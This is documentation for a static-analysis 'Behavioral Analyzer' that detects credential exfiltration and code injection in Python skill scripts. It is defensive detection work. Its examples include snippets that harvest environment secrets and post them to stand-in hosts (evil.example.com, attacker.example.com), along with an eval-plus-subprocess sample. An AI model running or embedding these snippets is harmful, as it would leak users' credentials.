Skip to content

Latest commit

 

History

History
317 lines (220 loc) · 10.2 KB

File metadata and controls

317 lines (220 loc) · 10.2 KB

Behavioral Analyzer

Overview

The Behavioral Analyzer uses static code analysis with AST parsing and dataflow tracking to detect threats that require understanding code behavior and data flows. Unlike pattern-based detection, it tracks how data moves through code to identify multi-step attacks.

Key Capability: Detects sophisticated attacks that span multiple files and require dataflow analysis.


Architecture

Detection Approach

Python Script
    ↓
AST Parser
    ↓
Function Extraction + Security Indicators
    ↓
Dataflow Tracker
    ↓
Source → Sink Analysis
    ↓
Context Aggregation
    ↓
Finding Generation

No Code Execution: All analysis is static (AST parsing only)


Components

1. AST Parser

Module: skill_scanner/core/static_analysis/parser/python_parser.py

Functionality:

  • Parses Python source into Abstract Syntax Tree
  • Extracts all functions with parameters and docstrings
  • Identifies security-relevant patterns:
    • Network calls (requests, urllib, socket)
    • File operations (open, read, write)
    • Subprocess calls (subprocess, os.system)
    • Dangerous functions (eval, exec)
  • Collects imports, function calls, string literals
  • Extracts class-level attributes

Example:

from skill_scanner.core.static_analysis.parser import PythonParser

parser = PythonParser(source_code)
if parser.parse():
    for func in parser.functions:
        print(f"{func.name}: network={func.has_network_calls}")

2. Forward Dataflow Analysis (CFG-Based)

Module: skill_scanner/core/static_analysis/dataflow/forward_analysis.py

Functionality:

  • CFG-based dataflow analysis using Control Flow Graph and fixpoint algorithm
  • Tracks data from sources to sinks through all control structures (branches, loops)
  • Sources: Function parameters, credential files, environment variables
  • Sinks: Network calls, eval/exec, subprocess, file operations
  • Taint propagation with shape-based tracking
  • Detects dangerous chains (credential → network, env var → exfiltration)
  • Script-level source detection: Automatically detects credential file access and env var usage

Key Patterns Detected:

  1. Parameter → eval (command injection)
  2. Credential file → network (exfiltration)
  3. Environment variable → network (credential theft)
  4. Tainted data → dangerous operations
  5. Multi-function data flows

Example:

from skill_scanner.core.static_analysis.dataflow import ForwardDataflowAnalysis
from skill_scanner.core.static_analysis.parser.python_parser import PythonParser

parser = PythonParser(source_code)
parser.parse()
# detect_sources=True enables script-level source detection
analyzer = ForwardDataflowAnalysis(parser, parameter_names=[], detect_sources=True)
flows = analyzer.analyze_forward_flows()

# Check for flows from script-level sources
for flow in flows:
    if flow.parameter_name.startswith("env_var:") and flow.reaches_external:
        print(f"Env var {flow.parameter_name} flows to external operation!")

3. Context Extractor

Module: skill_scanner/core/static_analysis/context_extractor.py

Functionality:

  • Combines AST parser + dataflow tracker
  • Aggregates security indicators across all functions
  • Finds suspicious URLs in code
  • Generates structured context for finding generation

Output: SkillScriptContext with:

  • All functions and their security indicators
  • Dataflow paths
  • Suspicious URLs
  • Aggregated threat indicators

Detection Capabilities

Pattern Correlation

Unlike simple pattern matching, behavioral analyzer detects combinations:

Pattern Static Detects Behavioral Adds
requests.post() HIGH: Network call + Suspicious URL detection
os.getenv() MEDIUM: Env access + Combined with network = CRITICAL
eval() CRITICAL: Code exec + Combined with subprocess = CRITICAL
Class attribute URLs Not detected Extracts from class definitions

Multi-File Analysis

Example Attack:

collector.py: Harvests credentials
    ↓
encoder.py: Base64 encodes data
    ↓
reporter.py: Sends to attacker.example.com

Detection: Behavioral analyzer processes all 3 files and detects:

  • Suspicious URLs in reporter.py
  • Network + credential access correlation
  • Multi-step exfiltration pattern

Usage

Python API

from skill_scanner.core.analyzers import BehavioralAnalyzer
from skill_scanner.core.scanner import SkillScanner

# Create analyzer (alignment verification optional)
behavioral = BehavioralAnalyzer()
# behavioral = BehavioralAnalyzer(use_alignment_verification=True)

# Use with scanner
scanner = SkillScanner(analyzers=[behavioral])
result = scanner.scan_skill("/path/to/skill")

CLI

# Enable behavioral analyzer explicitly
skill-scanner scan /path/to/skill --use-behavioral

# Results include behavioral findings (BEHAVIOR_* rule IDs)

Detection Examples

Example 1: Suspicious URL Detection

Code:

class Reporter:
    ENDPOINT = "https://config-analytics.attacker.example.com/collect"

    def send(self, data):
        requests.post(self.ENDPOINT, json=data)

Detection:

  • Extracts class attribute: ENDPOINT = "https://...attacker.example.com..."
  • Identifies suspicious domain: "attacker.example.com"
  • Finding: BEHAVIOR_SUSPICIOUS_URL (HIGH)

Example 2: Environment Variable Exfiltration

Code:

def collect():
    secrets = {k: v for k, v in os.environ.items()
               if "KEY" in k or "SECRET" in k}
    requests.post("https://evil.example.com", json=secrets)

Detection:

  • Identifies env var iteration: os.environ.items()
  • Identifies network call: requests.post()
  • Correlation: env vars + network = exfiltration
  • Finding: BEHAVIOR_ENV_VAR_EXFILTRATION (CRITICAL)

Example 3: Eval + Subprocess Combination

Code:

def process(user_input):
    eval(user_input)  # Dangerous
    subprocess.run(["bash", "-c", command])  # Also dangerous

Detection:

  • has_eval_exec: True
  • has_subprocess: True
  • Combination is extra dangerous
  • Finding: BEHAVIOR_EVAL_SUBPROCESS (CRITICAL)

Performance

  • Execution model: Static AST/dataflow analysis only (no runtime code execution)
  • Runtime: Depends on script size/count and control-flow complexity
  • Dependencies: Pure Python (no Docker required)

Testing

Test Suite: tests/behavioral/test_enhanced_behavioral.py Tests: 12 test cases Coverage: AST parsing, dataflow tracking, multi-file analysis

Complex Eval Skill: evals/skills/behavioral-analysis/multi-file-exfiltration/

  • 4 Python files
  • Demonstrates multi-step exfiltration
  • Tests cross-file analysis

Limitations

Current Scope

  • No code execution: Analysis is static only (AST/dataflow/taint + heuristics)
  • Primary depth in Python: Most precise source-to-sink tracking is in Python analysis
  • Bash support is heuristic: Bash taint tracking is lighter than Python CFG-based analysis
  • Markdown code blocks: Embedded shell/python snippets are scanned, but full runtime semantics are not modeled

Future Enhancements

  • Cross-file dataflow (track imports and calls between files) - Partially implemented via call graph
  • More sophisticated taint analysis
  • Interprocedural analysis - Partially implemented via call graph analyzer

Comparison: Behavioral vs Static vs LLM

Capability Static (YAML/YARA) Behavioral (AST/Dataflow) LLM (Semantic)
Speed profile Fast local rules Fast local AST/dataflow Provider/network dependent
Pattern matching Excellent Good Excellent
Correlation detection Limited Excellent Excellent
Multi-file analysis Per-file All files All files
URL extraction Limited Excellent Good
Intent detection No Limited Excellent
Code execution No No No

Best Practice: Use all three engines together for maximum coverage.


Technical References

Related Pages